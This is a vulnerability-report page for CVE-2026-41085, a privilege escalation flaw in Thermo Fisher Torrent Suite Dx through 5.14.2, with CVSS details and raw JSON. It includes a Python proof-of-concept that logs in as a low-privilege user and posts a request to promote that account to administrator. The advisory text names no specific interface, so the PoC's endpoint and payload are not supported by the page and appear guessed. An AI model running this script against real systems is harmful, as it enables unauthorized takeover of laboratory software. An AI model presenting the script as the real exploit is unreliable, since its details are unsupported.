Security Vulnerability Report
中文
CVE-2026-41085 CVSS 8.8 HIGH

CVE-2026-41085

Published: 2026-05-18 17:16:32
Last Modified: 2026-05-18 20:27:13

Description

Thermo Fisher Scientific Torrent Suite Dx through 5.14.2 has a privilege escalation vulnerability that may allow an authenticated user with limited access privileges to gain unauthorized administrator-level privileges through exploitation of specific system interfaces.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Thermo Fisher Scientific Torrent Suite Dx <= 5.14.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Target configuration target_host = "https://<target-ip>" vulnerable_endpoint = "/api/v1/system/update_role" # Low privilege user credentials creds = { "username": "limited_user", "password": "user_password" } # Create a session to maintain cookies session = requests.Session() # Step 1: Authenticate with low privilege account print("[*] Attempting login with low privilege user...") login_url = f"{target_host}/api/v1/login" login_resp = session.post(login_url, json=creds) if login_resp.status_code != 200: print("[-] Login failed.") exit(1) print("[+] Login successful.") # Step 2: Exploit privilege escalation via vulnerable interface # The system fails to check if the user is authorized to promote roles payload = { "user_id": "self", "new_role": "administrator" } print(f"[*] Sending exploit payload to {target_host}{vulnerable_endpoint}...") exploit_url = f"{target_host}{vulnerable_endpoint}" exploit_resp = session.post(exploit_url, json=payload) if exploit_resp.status_code == 200: print("[+] Exploit successful! Privileges escalated.") print("Response:", exploit_resp.text) else: print("[-] Exploit failed.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-41085", "sourceIdentifier": "[email protected]", "published": "2026-05-18T17:16:32.270", "lastModified": "2026-05-18T20:27:12.817", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Thermo Fisher Scientific Torrent Suite Dx through 5.14.2 has a privilege escalation vulnerability that may allow an authenticated user with limited access privileges to gain unauthorized administrator-level privileges through exploitation of specific system interfaces."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-269"}]}], "references": [{"url": "https://documents.thermofisher.com/TFS-Assets/CORP/Product-Guides/TorrentSuiteDxSoftware_v5_14_2.pdf", "source": "[email protected]"}, {"url": "https://thermofisher.com", "source": "[email protected]"}]}}